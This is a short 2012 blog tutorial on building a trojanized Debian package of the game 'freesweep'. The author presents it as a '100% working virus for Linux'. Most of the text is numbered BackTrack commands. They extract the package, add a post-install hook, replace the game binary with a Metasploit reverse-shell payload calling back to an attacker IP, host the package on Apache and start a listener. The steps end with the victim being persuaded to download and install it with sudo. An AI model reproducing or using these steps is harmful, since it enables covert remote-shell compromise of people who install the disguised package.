Monday, 2 July 2012

LINUX IS not SECURE virus for linux

WHO SAY LINUX IS SECURE (VIRUS FOR LINUX)

TODAY I WILL SHOW U 100% WORKING VIRUS FOR LINUX.....AND HOW TO CREATE IT FROM BACKTRACK ;;;;

PEOPLE WHO THINK THAT VIRUSES AND TROJANS ARE FOR WINDOWS ONLY HERE I GIVE U THE VIRUS PACKAGE FOR LINUX...

First we need to download the package that i will infect and move it to a temporary working directory. In my example, i will use the package 'freesweep',

1 seeker@bt#apt-get --download-only -install freesweep  

 //this command downloads the freesweep package ///

2 seeker@bt#mkdir /tmp/evil  

//this command is use to create directory evil in temp directory///


3 seeker@bt# mv /var/cache/apt/archives/freesweep_0.90-2_i386.deb /tmp/evil

//this command will move the freesweep package from archives to evil directory//

4 seeker@bt# cd /tmp/evil/


5 seeker@bt:/tmp/evil#dpkg -x freesweep_0.90-2_i386.deb work

 //this command will extract the package to a working directory//


6 seeker@bt:/tmp/evil#mkdir work/DEBIAN

///Now we need to create a DEBIAN directory to hold our additional added features. ///


7 seeker@bt:/tmp/evil/work/DEBIAN#vi control 

//In the 'DEBIAN' directory, create a file named 'control' that contains the following data as shown in snapshot//



8 seeker@bt:/tmp/evil/work/DEBIAN#vi postinst

// this command creates a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following data as shown in snapshot//





9 seeker@bt#msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.57.78  LPORT=443 X >
/tmp/evil/work/usr/games/freesweep


////this command is used to create a malicious payload that uses a  reverse shell to connect back to us named freesweep////



10 seeker@bt:/tmp/evil/work/DEBIAN#chmod 755 postinst

//in this command we make our script executable//


11 seeker@bt:/tmp/evil/work/DEBIAN#dpkg-deb --build /tmp/evil/work

//this command is used to build our new package work.deb///


12 seeker@bt:/tmp/evil#mv work.deb freesweep.deb

//change that to freesweep.deb //

13 seeker@bt:/tmp/evil#cp freesweep.deb /var /www/

//now we copy our malicious package to www directory to host it on apache///

14 seeker@bt:/tmp/evil#service apache2 start

//this command is used to start the apache service/// 




15 seeker@bt#msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp  LHOST=192.168.57.78 LPORT=443 E

//now we will  set up the Metasploit multi/handler to receive the incoming connection.//

16 ///in this step we convice our UBUNTU  victim to download the package (game) and install that package .////


victim@ubuntu:~$ wget http://192.168.57.78/freesweep.deb

victim@ubuntu:~$ sudo dpkg -i freesweep.deb
 

//NOW WHEN USER INSTALL OUR GAME WE GET THE COMMAND LINE SESSION//

 
 
 
 

 1000% WORKING

//EDUCATIONAL PURPOSE ONLY :)
Tutorial By Parvesh Janartha | King Metasploit | IT Security Consultant